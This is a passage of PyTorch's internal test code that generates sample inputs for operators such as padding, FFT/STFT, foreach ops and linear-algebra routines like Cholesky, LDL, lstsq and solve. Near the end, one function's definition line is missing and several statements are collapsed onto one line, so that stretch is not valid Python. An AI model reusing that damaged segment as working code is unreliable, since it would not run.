        yield SampleInput(tensor, args=args)

def sample_inputs_nn_pad(op_info, device, dtype, requires_grad, mode, **kwargs):
    assert mode in ('constant', 'reflect', 'replicate', 'circular')
    if mode in ['reflect', 'replicate']:
        cases: tuple = (  # ignore
            ((1, 3), (1, 2)),
            ((1, 3), (0, 1)),
            ((0, 3, 3), (1, 2)),
            ((0, 3, 3), (0, 1)),
            ((1, 3, 3), (1, 2)),
            ((1, 3, 3), (0, 1)),
            ((1, 3, 3), (0, 2, 0, 1)),
            ((0, 3, 3, 3), (0, 2, 0, 1)),
            ((3, 3, 5, 5), (0, 2, 0, 1)),
            ((3, 3, 5, 5), (1, 1, 1, 1, 1, 1)),
            ((1, 3, 3, 3, 3), (1, 1, 1, 1, 1, 1)),
            ((1, 3, 4, 4), (-1, 1, -2, 1)),
        )
    elif mode == 'constant':
        cases = (
            ((1, 3), (1, 2)),
            ((1, 3), (0, 1)),
            ((1, 3), (0, 2, 0, 1)),
            ((0, 3, 3), (1, 2)),
            ((0, 3, 3), (0, 1)),
            ((0, 3, 3), (0, 2, 0, 1)),
            ((0, 3, 3), (1, 1, 1, 1, 1, 1)),
            ((1, 3, 3), (1, 2)),
            ((1, 3, 3), (0, 1)),
            ((1, 3, 3), (0, 2, 0, 1)),
            ((1, 3, 3), (1, 1, 1, 1, 1, 1)),
            ((0, 3, 3, 3), (1, 2)),
            ((0, 3, 3, 3), (0, 1)),
            ((0, 3, 3, 3), (0, 2, 0, 1)),
            ((0, 3, 3, 3), (1, 1, 1, 1, 1, 1)),
            ((3, 3, 5, 5), (1, 2)),
            ((3, 3, 5, 5), (0, 1)),
            ((3, 3, 5, 5), (0, 2, 0, 1)),
            ((3, 3, 5, 5), (1, 1, 1, 1, 1, 1)),
            ((1, 3, 3, 3, 3), (1, 2)),
            ((1, 3, 3, 3, 3), (0, 1)),
            ((1, 3, 3, 3, 3), (0, 2, 0, 1)),
            ((1, 3, 3, 3, 3), (1, 1, 1, 1, 1, 1)),
            ((1, 3, 4, 4), (-1, 1, -2, 1)),
        )
    else:  # mode == 'circular'
        if dtype == torch.bool:
            # test_dtypes fails on ASAN for this case with a
            # runtime error: load of value 190, which is not a valid value for type 'bool'
            # Reference: https://github.com/pytorch/pytorch/pull/62814#issuecomment-894156562
            # Reference Issue: https://github.com/pytorch/pytorch/issues/63034
            cases = (
                ((2, 3, 3), (1, 2)),
                ((1, 3, 3), (1, 2)),
            )
        else:
            cases = (
                ((0, 3, 3), (1, 2)),
                ((0, 3, 3), (0, 1)),
                ((1, 3, 3), (1, 2)),
                ((1, 3, 3), (0, 1)),
                ((0, 3, 3, 3), (0, 2, 0, 1)),
                ((3, 3, 5, 5), (0, 2, 0, 1)),
                ((1, 3, 3, 3, 3), (1, 1, 1, 1, 1, 1)),
                ((1, 3, 4, 4), (-1, 1, -2, 1)),
            )

    make_inp = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    if mode == 'constant':
        # Default args
        yield SampleInput(make_inp((1, 3, 3)), args=((2, 2),))

    if mode in ['reflect', 'replicate', 'circular']:
        for shape, pad in cases:
            yield SampleInput(make_inp(shape), args=(pad, mode))
    else:  # mode == 'constant'
        for pad_value in (1., 2.):
            for shape, pad in cases:
                yield SampleInput(make_inp(shape), args=(pad, mode, pad_value))
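# Illustrative sketch (not part of the generated samples): the pad tuples above pair up as
# (left, right) per dimension, starting from the *last* dimension. `_demo_pad_pair_ordering`
# is a hypothetical helper.
def _demo_pad_pair_ordering():
    x = torch.randn(1, 3, 3)
    # (0, 2) pads the last dim, (0, 1) the second-to-last
    return torch.nn.functional.pad(x, (0, 2, 0, 1), mode='replicate').shape  # torch.Size([1, 4, 5])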
# TODO: reconcile with torch.linalg.det and torch.linalg.slogdet
# Creates matrices with a positive nonzero determinant
def sample_inputs_logdet(op_info, device, dtype, requires_grad, **kwargs):
    def make_nonzero_det(A, *, sign=1, min_singular_value=0.1, **kwargs):
        u, s, vh = torch.linalg.svd(A, full_matrices=False)
        s.clamp_(min=min_singular_value)
        A = (u * s.unsqueeze(-2)) @ vh
        det = A.det()
        if sign is not None:
            if A.dim() == 2:
                if (det < 0) ^ (sign < 0):
                    A[0, :].neg_()
            else:
                cond = ((det < 0) ^ (sign < 0)).nonzero()
                if cond.size(0) > 0:
                    for i in range(cond.size(0)):
                        A[list(cond[i])][0, :].neg_()
        return A

    # cases constructed using make_tensor()
    tensor_shapes = (
        (S, S),
        (1, 1),
        (3, 3, S, S),
        (3, 3, 1, 1)
    )

    for shape in tensor_shapes:
        t = make_tensor(shape, device=device, dtype=dtype)
        d = make_nonzero_det(t).requires_grad_(requires_grad)
        yield SampleInput(d)

    # cases constructed using:
    # 1) make_symmetric_matrices
    # 2) make_symmetric_pd_matrices
    # 3) make_fullrank_matrices_with_distinct_singular_values
    symmetric_shapes = (
        (S, S),
        (3, S, S),
    )

    def _helper(constructor, *shape, **kwargs):
        t = constructor(*shape, device=device, dtype=dtype)
        d = make_nonzero_det(t, **kwargs).requires_grad_(requires_grad)
        yield SampleInput(d)

    # `_helper` is a generator, so its output must be re-yielded here
    for shape in symmetric_shapes:
        yield from _helper(make_symmetric_matrices, *shape)
        yield from _helper(make_symmetric_pd_matrices, *shape)
        yield from _helper(make_fullrank_matrices_with_distinct_singular_values, *shape, min_singular_value=0)

def np_unary_ufunc_integer_promotion_wrapper(fn):
    # Wrapper that passes PyTorch's default scalar
    # type as an argument to the wrapped NumPy
    # unary ufunc when given an integer input.
    # This mimics PyTorch's integer->floating point
    # type promotion.
    #
    # This is necessary when NumPy promotes
    # integer types to double, since PyTorch promotes
    # integer types to the default scalar type.

    # Helper to determine if promotion is needed
    def is_integral(dtype):
        return dtype in [np.bool_, bool, np.uint8, np.int8, np.int16, np.int32, np.int64]

    @wraps(fn)
    def wrapped_fn(x):
        # As the default dtype can change, acquire it when function is called.
        # NOTE: Promotion in PyTorch is from integer types to the default dtype
        np_dtype = torch_to_numpy_dtype_dict[torch.get_default_dtype()]

        if is_integral(x.dtype):
            return fn(x.astype(np_dtype))
        return fn(x)

    return wrapped_fn
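# Illustrative sketch (not part of the test suite): the wrapper's effect on an integer input.
# Plain np.sin would compute in float64, while the wrapped reference computes in PyTorch's
# default scalar type (float32 unless changed). `_demo_integer_promotion` is a hypothetical helper.
def _demo_integer_promotion():
    np_sin_ref = np_unary_ufunc_integer_promotion_wrapper(np.sin)
    x = np.arange(3, dtype=np.int64)
    return np_sin_ref(x).dtype, np.sin(x).dtype  # (float32, float64) with default settings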
def sample_inputs_spectral_ops(self, device, dtype, requires_grad=False, **kwargs):
    is_fp16_or_chalf = dtype == torch.complex32 or dtype == torch.half
    if not is_fp16_or_chalf:
        nd_tensor = partial(make_tensor, (S, S + 1, S + 2), device=device,
                            dtype=dtype, requires_grad=requires_grad)
        oned_tensor = partial(make_tensor, (31,), device=device,
                              dtype=dtype, requires_grad=requires_grad)
    else:
        # cuFFT supports powers of 2 for half and complex half precision
        # NOTE: For hfft, hfft2, hfftn, irfft, irfft2, irfftn with default args
        # where output_size n=2*(input_size - 1), we make sure that logical fft size is a power of two
        if self.name in ['fft.hfft', 'fft.irfft']:
            shapes = ((2, 9, 9), (33,))
        elif self.name in ['fft.hfft2', 'fft.irfft2']:
            shapes = ((2, 8, 9), (33,))
        elif self.name in ['fft.hfftn', 'fft.irfftn']:
            shapes = ((2, 2, 33), (33,))
        else:
            shapes = ((2, 8, 16), (32,))
        nd_tensor = partial(make_tensor, shapes[0], device=device,
                            dtype=dtype, requires_grad=requires_grad)
        oned_tensor = partial(make_tensor, shapes[1], device=device,
                              dtype=dtype, requires_grad=requires_grad)

    if self.ndimensional == SpectralFuncType.ND:
        return [
            SampleInput(nd_tensor(),
                        kwargs=dict(s=(3, 10) if not is_fp16_or_chalf else (4, 8),
                                    dim=(1, 2),
                                    norm='ortho')),
            SampleInput(nd_tensor(), kwargs=dict(norm='ortho')),
            SampleInput(nd_tensor(), kwargs=dict(s=(8,))),
            SampleInput(oned_tensor()),
            *(SampleInput(nd_tensor(), kwargs=dict(dim=dim))
              for dim in [-1, -2, -3, (0, -1)]),
        ]
    elif self.ndimensional == SpectralFuncType.TwoD:
        return [
            SampleInput(nd_tensor(),
                        kwargs=dict(s=(3, 10) if not is_fp16_or_chalf else (4, 8),
                                    dim=(1, 2),
                                    norm='ortho')),
            SampleInput(nd_tensor(), kwargs=dict(norm='ortho')),
            SampleInput(nd_tensor(), kwargs=dict(s=(6, 8) if not is_fp16_or_chalf else (4, 8))),
            SampleInput(nd_tensor(), kwargs=dict(dim=0)),
            SampleInput(nd_tensor(), kwargs=dict(dim=(0, -1))),
            SampleInput(nd_tensor(), kwargs=dict(dim=(-3, -2, -1))),
        ]
    else:
        return [
            SampleInput(nd_tensor(),
                        kwargs=dict(n=10 if not is_fp16_or_chalf else 8,
                                    dim=1,
                                    norm='ortho')),
            SampleInput(nd_tensor(), kwargs=dict(norm='ortho')),
            SampleInput(nd_tensor(), kwargs=dict(n=7 if not is_fp16_or_chalf else 8)),
            SampleInput(oned_tensor()),
            *(SampleInput(nd_tensor(), kwargs=dict(dim=dim))
              for dim in [-1, -2, -3]),
        ]

def sample_inputs_repeat_interleave(op_info, device, dtype, requires_grad, **kwargs):
    make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    return [
        SampleInput(make_input(()), kwargs=dict(repeats=2)),
        SampleInput(make_input((2, 3, 4)), kwargs=dict(repeats=2)),
        SampleInput(make_input((2, 3, 4)), kwargs=dict(repeats=2, dim=1)),
        SampleInput(make_input((2, 3, 4)), kwargs=dict(repeats=torch.arange(3, device=device), dim=1))
    ]

SpectralFuncType = Enum('SpectralFuncType', ('OneD', 'TwoD', 'ND'))

# Metadata class for Fast Fourier Transforms in torch.fft.
class SpectralFuncInfo(OpInfo):
    """Operator information for torch.fft transforms. """

    def __init__(self,
                 name,  # the string name of the function
                 *,
                 ref=None,  # Reference implementation (probably in np.fft namespace)
                 dtypes=floating_and_complex_types(),
                 ndimensional: SpectralFuncType,
                 sample_inputs_func=sample_inputs_spectral_ops,
                 decorators=None,
                 **kwargs):
        decorators = list(decorators) if decorators is not None else []
        decorators += [
            skipCPUIfNoFFT,
            DecorateInfo(toleranceOverride({torch.chalf: tol(4e-2, 4e-2)}),
                         "TestCommon", "test_complex_half_reference_testing")
        ]

        super().__init__(name=name,
                         dtypes=dtypes,
                         decorators=decorators,
                         sample_inputs_func=sample_inputs_func,
                         **kwargs)
        self.ref = ref
        self.ndimensional = ndimensional

def sample_inputs_stft(op_info, device, dtype, requires_grad, **kwargs):
    def mt(shape, **kwargs):
        return make_tensor(shape, device=device, dtype=dtype,
                           requires_grad=requires_grad, **kwargs)

    yield SampleInput(mt(100), kwargs=dict(n_fft=10))

    for center in [False, True]:
        yield SampleInput(mt(10), kwargs=dict(n_fft=7, center=center))
        yield SampleInput(mt((10, 100)), kwargs=dict(n_fft=16, hop_length=4, center=center))

    window = make_tensor(16, low=.5, high=2.0, dtype=dtype, device=device, requires_grad=requires_grad)
    yield SampleInput(
        mt((2, 100)), kwargs=dict(n_fft=16, window=window, return_complex=True, center=center))
    yield SampleInput(
        mt((3, 100)), kwargs=dict(n_fft=16, window=window, return_complex=True, center=center))
    if not dtype.is_complex:
        yield SampleInput(
            mt((10, 100)), kwargs=dict(n_fft=16, window=window, onesided=False))

def sample_inputs_istft(op_info, device, dtype, requires_grad, **kwargs):
    def mt(shape, **kwargs):
        real_shape = shape if dtype.is_complex else shape + (2,)
        return make_tensor(real_shape, device=device, dtype=dtype,
                           requires_grad=requires_grad, **kwargs)

    yield SampleInput(mt((10, 2)), kwargs=dict(n_fft=10))
    yield SampleInput(mt((6, 3)), kwargs=dict(n_fft=6, onesided=False))
    yield SampleInput(mt((6, 4)), kwargs=dict(n_fft=10, onesided=True))

    for center in [False, True]:
        yield SampleInput(mt((10, 10, 6)), kwargs=dict(n_fft=10, center=center))
        yield SampleInput(mt((1, 9, 10)), kwargs=dict(n_fft=16, hop_length=4, center=center))

    window = make_tensor(10, low=.5, high=2.0, dtype=dtype, device=device, requires_grad=requires_grad)
    yield SampleInput(mt((10, 10, 6)), kwargs=dict(
        n_fft=10, window=window, center=center, return_complex=dtype.is_complex))
    yield SampleInput(mt((10, 10, 10)), kwargs=dict(
        n_fft=10, window=window[:8], win_length=8, center=center, return_complex=True))

    real_window = window if not dtype.is_complex else window.real
    yield SampleInput(mt((10, 5, 6)), kwargs=dict(n_fft=8, window=real_window[:8], center=center))
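# Illustrative sketch (not part of the generated samples): with a COLA-satisfying window and
# hop length, istft inverts stft up to numerical error, which is the property the samplers
# above exercise. `_demo_stft_istft_roundtrip` is a hypothetical helper.
def _demo_stft_istft_roundtrip():
    x = torch.randn(1000)
    window = torch.hann_window(16)
    spec = torch.stft(x, n_fft=16, hop_length=4, window=window, return_complex=True)
    recon = torch.istft(spec, n_fft=16, hop_length=4, window=window, length=x.numel())
    return torch.allclose(x, recon, atol=1e-5)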
def sample_inputs_fftshift(op_info, device, dtype, requires_grad, **kwargs):
    def mt(shape, **kwargs):
        return make_tensor(shape, device=device, dtype=dtype,
                           requires_grad=requires_grad, **kwargs)

    yield SampleInput(mt((9, 10)))
    yield SampleInput(mt((50,)), kwargs=dict(dim=0))
    yield SampleInput(mt((5, 11)), kwargs=dict(dim=(1,)))
    yield SampleInput(mt((5, 6)), kwargs=dict(dim=(0, 1)))
    yield SampleInput(mt((5, 6, 2)), kwargs=dict(dim=(0, 2)))

class ShapeFuncInfo(OpInfo):
    """Early version of a specialized OpInfo for Shape manipulating operations like tile and roll"""
    def __init__(self,
                 name,  # the string name of the function
                 *,
                 ref,  # a reference function
                 dtypes=floating_types(),
                 dtypesIfCUDA=None,
                 dtypesIfROCM=None,
                 sample_inputs_func=None,
                 **kwargs):
        super(ShapeFuncInfo, self).__init__(name,
                                            dtypes=dtypes,
                                            dtypesIfCUDA=dtypesIfCUDA,
                                            dtypesIfROCM=dtypesIfROCM,
                                            sample_inputs_func=sample_inputs_func,
                                            **kwargs)
        self.ref = ref

def sample_inputs_foreach(self, device, dtype, N, *, noncontiguous=False, same_size=False, low=None, high=None):
    if same_size:
        return [make_tensor((N, N), dtype=dtype, device=device, noncontiguous=noncontiguous) for _ in range(N)]
    else:
        return [make_tensor((N - i, N - i), dtype=dtype, device=device, noncontiguous=noncontiguous) for i in range(N)]

def get_foreach_method_names(name):
    # get torch inplace reference function
    op_name = "_foreach_" + name
    inplace_op_name = "_foreach_" + name + "_"

    op = getattr(torch, op_name, None)
    inplace_op = getattr(torch, inplace_op_name, None)

    ref = getattr(torch, name, None)
    ref_inplace = getattr(torch.Tensor, name + "_", None)
    return op, inplace_op, ref, ref_inplace

class ForeachFuncInfo(OpInfo):
    """Early version of a specialized OpInfo for foreach functions"""
    def __init__(self,
                 name,
                 dtypes=floating_and_complex_types(),
                 dtypesIfCUDA=floating_and_complex_types_and(torch.half),
                 dtypesIfROCM=None,
                 supports_alpha_param=False,
                 sample_inputs_func=sample_inputs_foreach,
                 **kwargs):
        super().__init__(
            "_foreach_" + name,
            dtypes=dtypes,
            dtypesIfCUDA=dtypesIfCUDA,
            dtypesIfROCM=dtypesIfROCM,
            sample_inputs_func=sample_inputs_func,
            **kwargs
        )

        foreach_method, foreach_method_inplace, torch_ref_method, torch_ref_inplace = get_foreach_method_names(name)
        self.method_variant = foreach_method
        self.inplace_variant = foreach_method_inplace
        self.ref = torch_ref_method
        self.ref_inplace = torch_ref_inplace
        self.supports_alpha_param = supports_alpha_param

        if name == "norm":
            self.ref = torch.linalg.vector_norm
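# Illustrative sketch (not part of the test suite): what get_foreach_method_names resolves to
# for a typical op. `_demo_foreach_lookup` is a hypothetical helper.
def _demo_foreach_lookup():
    op, inplace_op, ref, ref_inplace = get_foreach_method_names("add")
    # op -> torch._foreach_add, inplace_op -> torch._foreach_add_,
    # ref -> torch.add, ref_inplace -> torch.Tensor.add_
    return op is torch._foreach_add and ref is torch.add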
def sample_inputs_linalg_cholesky_inverse(op_info, device, dtype, requires_grad=False, **kwargs):
    from torch.testing._internal.common_utils import random_well_conditioned_matrix

    # Cholesky factorization is for positive-definite matrices
    single_well_conditioned_matrix = random_well_conditioned_matrix(S, S, dtype=dtype, device=device)
    batch_well_conditioned_matrices = random_well_conditioned_matrix(2, S, S, dtype=dtype, device=device)
    single_pd = single_well_conditioned_matrix @ single_well_conditioned_matrix.mH
    batch_pd = batch_well_conditioned_matrices @ batch_well_conditioned_matrices.mH

    inputs = (
        torch.zeros(0, 0, dtype=dtype, device=device),  # 0x0 matrix
        torch.zeros(0, 2, 2, dtype=dtype, device=device),  # zero batch of matrices
        single_pd,
        batch_pd
    )
    test_cases = (torch.linalg.cholesky(a, upper=False) for a in inputs)
    for l in test_cases:
        # generated lower-triangular samples
        l.requires_grad = requires_grad
        yield SampleInput(l)  # upper=False by default
        yield SampleInput(l.detach().clone().requires_grad_(requires_grad),
                          kwargs=dict(upper=False))

        # generate upper-triangular inputs
        u = l.detach().clone().mT.contiguous().requires_grad_(requires_grad)
        yield SampleInput(u, kwargs=dict(upper=True))
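# Illustrative sketch (not part of the generated samples): the lower/upper pair generated above
# are each other's conjugate transpose for a Hermitian positive-definite input.
# `_demo_cholesky_upper_lower` is a hypothetical helper.
def _demo_cholesky_upper_lower():
    a = torch.randn(4, 4)
    a = a @ a.mH + torch.eye(4)  # make positive-definite
    l = torch.linalg.cholesky(a)              # lower-triangular by default
    u = torch.linalg.cholesky(a, upper=True)  # equals l.mH
    return torch.allclose(u, l.mH)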
def sample_inputs_linalg_ldl_factor(op_info, device, dtype, requires_grad=False, **kwargs):
    from torch.testing._internal.common_utils import (
        random_hermitian_pd_matrix,
        random_symmetric_pd_matrix,
    )

    device = torch.device(device)

    # Symmetric inputs
    yield SampleInput(
        random_symmetric_pd_matrix(S, dtype=dtype, device=device),
        kwargs=dict(hermitian=False),
    )  # single matrix
    yield SampleInput(
        random_symmetric_pd_matrix(S, 2, dtype=dtype, device=device),
        kwargs=dict(hermitian=False),
    )  # batch of matrices
    yield SampleInput(
        torch.zeros(0, 0, dtype=dtype, device=device),
        kwargs=dict(hermitian=False)
    )  # 0x0 matrix
    yield SampleInput(
        torch.zeros(0, 2, 2, dtype=dtype, device=device),
        kwargs=dict(hermitian=False)
    )  # zero batch of matrices

    # Hermitian inputs
    # hermitian=True for complex inputs on CUDA is supported only with MAGMA 2.5.4+
    magma_254_available = device.type == 'cuda' and _get_magma_version() >= (2, 5, 4)
    if dtype.is_complex and (device.type == 'cpu' or magma_254_available):
        yield SampleInput(
            random_hermitian_pd_matrix(S, dtype=dtype, device=device),
            kwargs=dict(hermitian=True),
        )  # single matrix
        yield SampleInput(
            random_hermitian_pd_matrix(S, 2, dtype=dtype, device=device),
            kwargs=dict(hermitian=True),
        )  # batch of matrices

def sample_inputs_linalg_ldl_solve(op_info, device, dtype, requires_grad=False, **kwargs):
    # Generate LDL factors of symmetric (and Hermitian on CPU) matrices
    from torch.testing._internal.common_utils import random_hermitian_pd_matrix, random_symmetric_pd_matrix
    device = torch.device(device)
    symmetric_inputs = (
        random_symmetric_pd_matrix(S, dtype=dtype, device=device),  # single matrix
        random_symmetric_pd_matrix(S, 2, dtype=dtype, device=device),  # batch of matrices
        torch.zeros(0, 0, dtype=dtype, device=device),  # 0x0 matrix
        torch.zeros(0, 2, 2, dtype=dtype, device=device),  # zero batch of matrices
    )
    hermitian_inputs = (
        random_hermitian_pd_matrix(S, dtype=dtype, device=device),
        random_hermitian_pd_matrix(S, 2, dtype=dtype, device=device),
    ) if device.type == 'cpu' and dtype.is_complex else ()
    test_cases1 = (torch.linalg.ldl_factor_ex(a, hermitian=False) for a in symmetric_inputs)
    test_cases2 = (torch.linalg.ldl_factor_ex(a, hermitian=True) for a in hermitian_inputs)

    # Symmetric case
    for test_case in test_cases1:
        factors, pivots, _ = test_case
        factors.requires_grad = requires_grad
        for B_batch_shape in ((), factors.shape[:-2]):
            B = make_tensor((*B_batch_shape, factors.shape[-1], S), device=device, dtype=dtype,
                            requires_grad=requires_grad)
            yield SampleInput(factors, args=(pivots, B), kwargs=dict(hermitian=False))
            clone_factors = factors.detach().clone().requires_grad_(requires_grad)
            yield SampleInput(clone_factors, args=(pivots, B), kwargs=dict(hermitian=False))

    # Hermitian case
    for test_case in test_cases2:
        factors, pivots, _ = test_case
        factors.requires_grad = requires_grad
        for B_batch_shape in ((), factors.shape[:-2]):
            B = make_tensor((*B_batch_shape, factors.shape[-1], S), device=device, dtype=dtype,
                            requires_grad=requires_grad)
            yield SampleInput(factors, args=(pivots, B), kwargs=dict(hermitian=True))
            clone_factors = factors.detach().clone().requires_grad_(requires_grad)
            yield SampleInput(clone_factors, args=(pivots, B), kwargs=dict(hermitian=True))

def sample_inputs_linalg_lstsq(op_info, device, dtype, requires_grad=False, **kwargs):
    from torch.testing._internal.common_utils import random_well_conditioned_matrix

    device = torch.device(device)

    drivers: Tuple[str, ...]
    if device.type == 'cuda':
        drivers = ('gels',)
    else:
        drivers = ('gels', 'gelsy', 'gelss', 'gelsd')

    # we generate matrices of shape (..., n + delta, n)
    deltas: Tuple[int, ...]
    if device.type == 'cpu' or has_cusolver():
        deltas = (-1, 0, +1)
    # only square systems if cuSOLVER is not available,
    # because we solve a lstsq problem with a transposed matrix in the backward
    else:
        deltas = (0,)

    out = []
    for batch, driver, delta in product(((), (3,), (3, 3)), drivers, deltas):
        shape = batch + (3 + delta, 3)
        a = random_well_conditioned_matrix(*shape, dtype=dtype, device=device)
        a.requires_grad_(requires_grad)
        b = make_tensor(shape, dtype=dtype, device=device, low=None, high=None,
                        requires_grad=requires_grad)
        out.append(SampleInput(a, args=(b,), kwargs=dict(driver=driver)))
    return out

def sample_inputs_householder_product(op_info, device, dtype, requires_grad, **kwargs):
    """
    This function generates input for torch.linalg.householder_product (torch.orgqr).
    The first argument should be a square matrix or batch of square matrices,
    the second argument is a vector or batch of vectors.
    Empty, square, rectangular, batched square and batched rectangular input is generated.
    """
    # Each column of the matrix is getting multiplied many times leading to very large values for
    # the Jacobian matrix entries and making the finite-difference result of grad check less accurate.
    # That's why gradcheck with the default range [-9, 9] fails and [-2, 2] is used here.
    samples = (
        SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)),

        SampleInput(make_tensor((S + 1, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)),

        SampleInput(make_tensor((2, 1, S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((2, 1, S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)),

        SampleInput(make_tensor((2, 1, S + 1, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((2, 1, S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)),

        SampleInput(make_tensor((0, 0), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
                    args=(make_tensor((0,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)),

        SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((0,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)),

        # m = n = S, k = S - 2
        SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((S - 2,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)),

        # m = S, n = S - 1, k = S - 2
        SampleInput(make_tensor((S, S - 1), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((S - 2,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)),
    )

    return samples
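# Illustrative sketch (not part of the generated samples): householder_product consumes the
# (reflectors, tau) pair produced by torch.geqrf and reconstructs the Q factor of the QR
# decomposition, which is the pairing the shapes above are modeled on.
# `_demo_householder_product_q` is a hypothetical helper.
def _demo_householder_product_q():
    a = torch.randn(5, 3)
    reflectors, tau = torch.geqrf(a)
    q = torch.linalg.householder_product(reflectors, tau)
    return q.shape  # torch.Size([5, 3])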
def sample_inputs_ormqr(op_info, device, dtype, requires_grad, **kwargs):
    # create a helper function wrapping `make_tensor`
    make_input = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    def gen_inputs():
        batches = [(), (0, ), (2, ), (2, 1)]
        ns = [5, 2, 0]
        tf = [True, False]
        for batch, (m, n), left, transpose in product(batches, product(ns, ns), tf, tf):
            reflectors = make_input((*batch, m, n))
            tau = make_input((*batch, min(m, n)))
            other_matrix_shape = (m, n) if left else (n, m)
            other = make_input((*batch, *other_matrix_shape))
            kwargs = {"left": left, "transpose": transpose}
            yield SampleInput(reflectors, args=(tau, other,), kwargs=kwargs)

    return tuple(gen_inputs())

def sample_inputs_linalg_cholesky(op_info, device, dtype, requires_grad=False, **kwargs):
    """
    This function generates always positive-definite input for torch.linalg.cholesky using
    random_hermitian_pd_matrix.
    The input is generated as the itertools.product of 'batches', 'ns' and the 'upper' flag.
    In total this function generates 16 SampleInputs.
    'batches' cases include:
        () - single input,
        (0,) - zero batched dimension,
        (2,) - batch of two matrices,
        (1, 1) - 1x1 batch of matrices
    'ns' gives 0x0 and 5x5 matrices.
    Zeros in dimensions are edge cases in the implementation and important to test for in order to avoid unexpected crashes.
    """
    from torch.testing._internal.common_utils import random_hermitian_pd_matrix

    batches = [(), (0, ), (2, ), (1, 1)]
    ns = [5, 0]
    out = []
    for batch, n, upper in product(batches, ns, [True, False]):
        a = random_hermitian_pd_matrix(n, *batch, dtype=dtype, device=device)
        a.requires_grad = requires_grad
        out.append(SampleInput(a, kwargs={"upper": upper}))
    return out

def sample_inputs_symeig(op_info, device, dtype, requires_grad=False, **kwargs):
    out = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad)

    for o in out:
        o.kwargs = {"upper": bool(np.random.choice([True, False])),
                    "eigenvectors": True}
        # A gauge-invariant function
        o.output_process_fn_grad = lambda output: (output[0], abs(output[1]))
        yield o

def sample_inputs_linalg_eig(op_info, device, dtype, requires_grad=False, **kwargs):
    """
    This function generates input for torch.linalg.eig
    """
    def out_fn(output):
        return output[0], abs(output[1])

    samples = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad)
    for sample in samples:
        sample.output_process_fn_grad = out_fn
        yield sample

def sample_inputs_linalg_eigh(op_info, device, dtype, requires_grad=False, **kwargs):
    """
    This function generates input for torch.linalg.eigh/eigvalsh with UPLO="U" or "L" keyword argument.
    """
    def out_fn(output):
        if isinstance(output, tuple):
            # eigh function
            return output[0], abs(output[1])
        else:
            # eigvalsh function
            return output

    # Samples do not need to be Hermitian, as we're using gradcheck_wrapper_hermitian_input
    samples = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad)
    for sample in samples:
        sample.kwargs = {"UPLO": np.random.choice(["L", "U"])}
        sample.output_process_fn_grad = out_fn
        yield sample

def sample_inputs_linalg_slogdet(op_info, device, dtype, requires_grad=False, **kwargs):
    def out_fn(output):
        return output[1]

    samples = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad)
    for sample in samples:
        sample.output_process_fn_grad = out_fn
        yield sample
""" for o in sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad, **kwargs): real_dtype = o.input.real.dtype if dtype.is_complex else dtype # requires_grad path for rtol tensor is not implemented for rtol in (None, 1.0, torch.tensor(1.0, dtype=real_dtype, device=device)): o = clone_sample(o) o.kwargs = {"rtol": rtol} yield o def sample_inputs_linalg_pinv_hermitian(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.pinv with hermitian=True keyword argument. """ for o in sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad, **kwargs): o.kwargs = {"hermitian": True} yield o def sample_inputs_linalg_solve(op_info, device, dtype, requires_grad=False, vector_rhs_allowed=True, **kwargs): """ This function generates always solvable input for torch.linalg.solve We sample a fullrank square matrix (i.e. invertible) A The first input to torch.linalg.solve is generated as the itertools.product of 'batches' and 'ns'. The second input is generated as the product of 'batches', 'ns' and 'nrhs'. In total this function generates 18 SampleInputs 'batches' cases include: () - single input, (0,) - zero batched dimension, (2,) - batch of two matrices. 'ns' gives 0x0 and 5x5 matrices. and 'nrhs' controls the number of vectors to solve for: () - using 1 as the number of vectors implicitly (1,) - same as () but explicit (3,) - solve for 3 vectors. Zeros in dimensions are edge cases in the implementation and important to test for in order to avoid unexpected crashes. 'vector_rhs_allowed' controls whether to include nrhs = () to the list of SampleInputs. torch.solve / triangular_solve / cholesky_solve (opposed to torch.linalg.solve) do not allow 1D tensors (vectors) as the right-hand-side. Once torch.solve / triangular_solve / cholesky_solve and its testing are removed, 'vector_rhs_allowed' may be removed here as well. """ make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_a = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) make_b = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0, ), (2, )] ns = [5, 0] if vector_rhs_allowed: nrhs = [(), (1,), (3,)] else: nrhs = [(1,), (3,)] for n, batch, rhs in product(ns, batches, nrhs): yield SampleInput(make_a(*batch, n, n), args=(make_b((batch + (n,) + rhs)),)) def sample_inputs_linalg_solve_triangular(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) bs = (1, 2, 0) ns = (3, 0) ks = (1, 3, 0) for b, n, k, (left, upper, uni) in product(bs, ns, ks, product((True, False), repeat=3)): if b == 